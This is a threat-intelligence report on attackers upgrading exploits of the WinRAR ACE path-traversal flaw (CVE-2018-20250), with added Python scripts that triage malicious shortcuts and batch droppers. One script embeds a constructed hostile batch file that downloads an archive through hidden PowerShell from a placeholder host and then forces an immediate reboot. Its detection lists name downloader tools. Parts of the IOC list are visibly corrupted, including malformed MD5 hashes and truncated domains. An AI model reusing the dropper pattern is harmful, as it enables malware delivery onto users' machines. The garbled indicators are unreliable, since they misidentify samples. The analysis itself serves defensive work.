

WinRAR (CVE-2018-20250) exploits upgraded to reduce dependence on a system restart

Author: fsadmin


Since the unacev2.dll vulnerability in WinRAR (CVE-2018-20250) was disclosed, its simplicity and ease of exploitation have made it popular with malware authors and cybercrime groups, and a variety of malicious exploits have followed.

1. Overview

The WinRAR unacev2.dll vulnerability (CVE-2018-20250) is a path traversal in the ACE decompression library: a crafted archive can write a file to an arbitrary directory on extraction, most commonly the user's Start Menu Startup folder. Because the flaw is simple and easy to exploit, it has been widely adopted by malware authors and cybercrime groups. Exploiting it has one obvious weakness, however: the dropped payload does not run until the victim restarts the system (or logs on again), so the attacker has to wait.

Tencent Security Yujian Threat Intelligence Center has recently observed attackers upgrading their WinRAR exploitation chains. The upgrades reduce, to a certain extent, the dependence on the victim actively restarting the system, and ensure that the malicious Trojan starts at the first opportunity.

The conventional exploitation flow, and the two upgraded attack flows analysed below, are shown as diagrams in the original report:

(1) Attack method 1

(2) Attack method 2

2. Analysis

Attack method 1:

Attack method 1 combines the WinRAR exploit with malicious .lnk shortcuts, both to evade anti-virus detection and to increase the probability that the Trojan is executed. The sample information and analysis follow.

MD5: 3e86873fab89792c3f2302b4deb2377f

File name: mirotvorec.rar

Opening mirotvorec.rar in WinRAR shows the visible archive contents (screenshot in the original report).

Extracting mirotvorec.rar with a vulnerable WinRAR reveals that, in addition to the visible contents, the archive writes two .lnk files and one .exe file to the following locations:

File 1: %userprofile%\win.exe (user profile directory)

File 2: c:\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Goggle Chrome.lnk (Start Menu Startup folder)

File 3: c:\desktop\GoggleChrome.lnk (desktop shortcut)

File 1 is the final Trojan to be executed, dropped under %userprofile% (the user directory). Files 2 and 3 have identical contents: both masquerade as a Chrome browser shortcut (the attacker misspells Google as Goggle), but the target the shortcut actually launches is %userprofile%\win.exe, i.e. file 1.

Note that running win.exe directly from the user directory prompts for a password and does not continue without the correct one. That password is supplied as the command-line argument of the shortcut described above: double-clicking Goggle Chrome.lnk passes it automatically, so the password dialog (shown in the original report) never appears. Execution is thereby gated on a secret that an automated sandbox executing win.exe on its own does not have.

This attack differs from earlier WinRAR exploit campaigns in four ways:

1) To evade anti-virus detection, the final Trojan is not dropped into the system Startup folder but into the user profile directory. To still run after a restart, a malicious .lnk masquerading as a Chrome browser shortcut is dropped into the Startup folder; the shortcut is in fact a launcher for the Trojan.

2) To raise the probability of execution, and to compensate for the exploit's dependence on a restart, the same malicious .lnk is also dropped onto the desktop to lure the victim into clicking it manually.

3) To evade anti-virus detection, the Trojan requires the correct password before it will run; this keeps the automated analysis systems of anti-virus vendors from observing anything anomalous.

4) The Trojan is executed either when the user restarts the system or when the user double-clicks the malicious .lnk.
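As an added example, not part of the original report, the following Python script parses the target path and command-line arguments out of a Windows .lnk file and flags the combination described above: a Startup-folder shortcut whose name suggests a browser but whose target is an executable in the user profile, launched with an argument. The shortcut it examines is constructed inside the script with a hypothetical path C:\Users\victim\win.exe and password S3cret, standing in for the Goggle Chrome.lnk -> %userprofile%\win.exe pattern; the parser follows the MS-SHLLINK layout (header, optional IDList, LinkInfo with an ANSI LocalBasePath, then StringData), so it also works on real shortcuts of that common shape.

```python
import struct

# CLSID 00021401-0000-0000-C000-000000000046 that opens every Shell Link file
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits from MS-SHLLINK 2.1.1
HAS_ID_LIST, HAS_LINK_INFO, HAS_ARGUMENTS, IS_UNICODE = 0x01, 0x02, 0x20, 0x80
STRING_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location"))

TRUSTED_PREFIXES = (r"c:\program files", r"c:\windows")
BRAND_BINARIES = {"chrome": "chrome.exe", "firefox": "firefox.exe", "edge": "msedge.exe"}


def parse_lnk(data):
    """Return the LocalBasePath target and the StringData fields of a .lnk file."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C
    if flags & HAS_ID_LIST:                      # skip the LinkTargetIDList block (uint16 size + items)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    target = None
    if flags & HAS_LINK_INFO:
        info_size, _hdr, info_flags, _vol, base_off, _net, _suffix = struct.unpack_from("<7I", data, pos)
        if info_flags & 0x01:                    # VolumeIDAndLocalBasePath: ANSI, NUL-terminated
            start = pos + base_off
            target = data[start:data.index(b"\x00", start)].decode("cp1252", "replace")
        pos += info_size
    result = {"target": target}
    for bit, name in STRING_FIELDS:             # StringData: uint16 character count, then the characters
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            if flags & IS_UNICODE:
                result[name] = data[pos:pos + 2 * count].decode("utf-16-le")
                pos += 2 * count
            else:
                result[name] = data[pos:pos + count].decode("cp1252", "replace")
                pos += count
    return result


def triage_startup_lnk(name, data):
    """Heuristics for a shortcut found in the Startup folder; returns a list of findings."""
    info = parse_lnk(data)
    target = info.get("target") or ""
    low = target.lower()
    basename = low.rsplit("\\", 1)[-1]
    findings = []
    untrusted = bool(low) and not low.startswith(TRUSTED_PREFIXES)
    if untrusted:
        findings.append(f"target outside trusted install directories: {target}")
    for brand, binary in BRAND_BINARIES.items():
        if brand in name.lower() and basename != binary:
            findings.append(f"shortcut name suggests {brand} but target is {basename or '?'}")
    if untrusted and info.get("arguments"):
        findings.append(f"untrusted target launched with arguments: {info['arguments']}")
    return findings


def build_lnk(local_base_path, arguments):
    """Construct a minimal .lnk for testing (constructed data, not a real sample)."""
    # VolumeID: size 0x11, DRIVE_FIXED, serial number, label offset 0x10, empty label
    volume_id = struct.pack("<4I", 0x11, 3, 0x12345678, 0x10) + b"\x00"
    base = local_base_path.encode("cp1252") + b"\x00"
    vol_off = 0x1C
    base_off = vol_off + len(volume_id)
    suffix_off = base_off + len(base)
    total = suffix_off + 1                                   # +1 for the empty CommonPathSuffix
    link_info = struct.pack("<7I", total, 0x1C, 0x01, vol_off, base_off, 0, suffix_off) + volume_id + base + b"\x00"
    flags = HAS_ID_LIST | HAS_LINK_INFO | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags) + bytes(0x4C - 0x18)
    id_list = struct.pack("<H", 2) + b"\x00\x00"              # IDList holding only the TerminalID
    string_data = struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    return header + id_list + link_info + string_data


if __name__ == "__main__":
    # Constructed stand-in for Goggle Chrome.lnk -> %userprofile%\win.exe <password>
    sample = build_lnk(r"C:\Users\victim\win.exe", "S3cret")
    print(parse_lnk(sample))
    for finding in triage_startup_lnk("Goggle Chrome.lnk", sample):
        print("-", finding)
```

Run it over every .lnk in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup; a genuine browser shortcut resolves into Program Files and carries no password-like argument, so it produces no findings, while the dropper's shortcut trips all three checks.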

Attack method 2:

In attack method 2, a malicious .bat file downloads and extracts the ACE archive and then forces the system to restart, so the Trojan runs without waiting for the victim. The sample information and analysis follow.

MD5: 1e541b14b531bcac70e77a012b0f0f7f

File name: __Denuncia_Activa_CL.PDF.bat

Opening the .bat file in Notepad++ shows garbled text; the status bar at the lower right indicates that the file is encoded as UCS-2 Little Endian (UTF-16LE). cmd.exe still executes a UTF-16LE batch file that begins with a byte-order mark, so this encoding hides the commands from byte-string scanners and simple grep without breaking the script.

Opening the same file in a hex editor reveals its actual content.

When executed, the .bat file first generates a random number and uses it as the file name for the malicious RAR archive it is about to download.

It then sets the download directory and file name and invokes PowerShell to download the malicious archive from a hard-coded URL.

Finally it calls WinRAR to extract the archive, which triggers the vulnerability and drops the Trojan into the Startup folder, and runs `shutdown -r` to force an immediate restart so that the Trojan starts at the first opportunity.
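As an added example, not from the original report, the Python triage script below automates what the analyst did above: it sniffs the byte-order mark, decodes the UTF-16LE batch file, and extracts the download URL, the PowerShell downloader line, the WinRAR extraction command and the forced-restart command. The batch script it analyses, including its URL under example.invalid, is constructed here for illustration and mirrors the steps described above; it is not the actual sample.

```python
import re

URL_RE = re.compile(r"https?://[^\s\"'<>()]+", re.I)
REBOOT_RE = re.compile(r"\bshutdown\b.*\s[-/]r\b", re.I)
DOWNLOADERS = ("powershell", "certutil", "bitsadmin")
EXTRACTORS = ("winrar.exe", "\\rar.exe", "unrar")


def decode_script(raw):
    """Decode a batch file by sniffing its byte-order mark; cmd.exe honours UTF-16LE with a BOM."""
    if raw.startswith(b"\xff\xfe"):
        return raw[2:].decode("utf-16-le", "replace")
    if raw.startswith(b"\xfe\xff"):
        return raw[2:].decode("utf-16-be", "replace")
    if raw.startswith(b"\xef\xbb\xbf"):
        return raw[3:].decode("utf-8", "replace")
    # No BOM: UTF-16LE text made of ASCII has a NUL at every odd byte position
    if len(raw) >= 4 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", "replace")
    return raw.decode("cp1252", "replace")


def extract_iocs(text):
    """Pull URLs, downloader, archive-extraction and forced-reboot lines out of a decoded script."""
    iocs = {"urls": [], "downloaders": [], "extractors": [], "reboot": False}
    for line in text.splitlines():
        low = line.lower()
        iocs["urls"].extend(URL_RE.findall(line))
        if any(tool in low for tool in DOWNLOADERS):
            iocs["downloaders"].append(line.strip())
        if any(tool in low for tool in EXTRACTORS):
            iocs["extractors"].append(line.strip())
        if REBOOT_RE.search(low):
            iocs["reboot"] = True
    return iocs


def triage(raw):
    """Decode, extract, and record whether a byte-level grep for 'powershell' would have missed it."""
    text = decode_script(raw)
    report = extract_iocs(text)
    report["hidden_from_byte_grep"] = b"powershell" not in raw.lower() and "powershell" in text.lower()
    return report


# Constructed sample mirroring the described steps (placeholder URL, not the real one)
SAMPLE_BAT = (
    "@echo off\r\n"
    "set /a n=%random%\r\n"
    "set dir=%temp%\r\n"
    "set file=%dir%\\%n%.rar\r\n"
    "powershell -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
    "'http://example.invalid/wp-content/uploads/denuncias.rar', '%file%')\"\r\n"
    "\"%ProgramFiles%\\WinRAR\\WinRAR.exe\" x -ibck -o+ \"%file%\" \"%dir%\\\"\r\n"
    "shutdown -r -t 0 -f\r\n"
)
SAMPLE_RAW = b"\xff\xfe" + SAMPLE_BAT.encode("utf-16-le")

if __name__ == "__main__":
    print(triage(SAMPLE_RAW))
```

The `hidden_from_byte_grep` flag is the practical lesson of this sample: a YARA or grep rule written against the ASCII string `powershell` never matches the on-disk file, because every character is followed by a NUL byte, while the decoded text matches immediately. Detection content for batch droppers should therefore either run after decoding or include UTF-16LE (`wide`) string variants.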

3. Security recommendations

1. The unacev2.dll vulnerability is not limited to WinRAR: many compression tools bundle the same library and are at risk. Users should upgrade all such software to the latest version (WinRAR 5.70 and later no longer ship UNACEV2.DLL and have dropped ACE support). The software management feature of Tencent PC Manager can perform the upgrade.

2. Alternatively, delete UNACEV2.DLL from the WinRAR installation directory. ACE archives will then no longer open, but the impact is small: the company that held the ACE format rights closed more than ten years ago, and the format can be abandoned entirely.

3. Do not open files of unknown origin or purpose.

4. IOCs

IP

195.62.52.164

DOMAIN

lisingrout.ddns.net

.poderjudicial.cl

.triosalud.cl

MD5

3e86873fab89792c3f2302b4deb2377f

64c3556574daa5bc76a5cede8f8bfcd7

f2c78f8b3582eae0af8912b0293ca8a5

fbc78f8b3582eae0af8912b0293ca8baffb778deb778d80dbcd

0f80d 410b77d8f1cdc76c867b4a6a27ae55e5

URL

hxxps://.triosalud.cl/wp/wp-content/uploads/2019/02/denuncias.rar

hxxps://.triosalud.cl/wp/wp-content/uploads/2019/03/denuncias.rar

hxxps://.triosalud.cl/wp/wp-content/uploads/2019/03/up.php

hxxp://.poderjudicial.cl

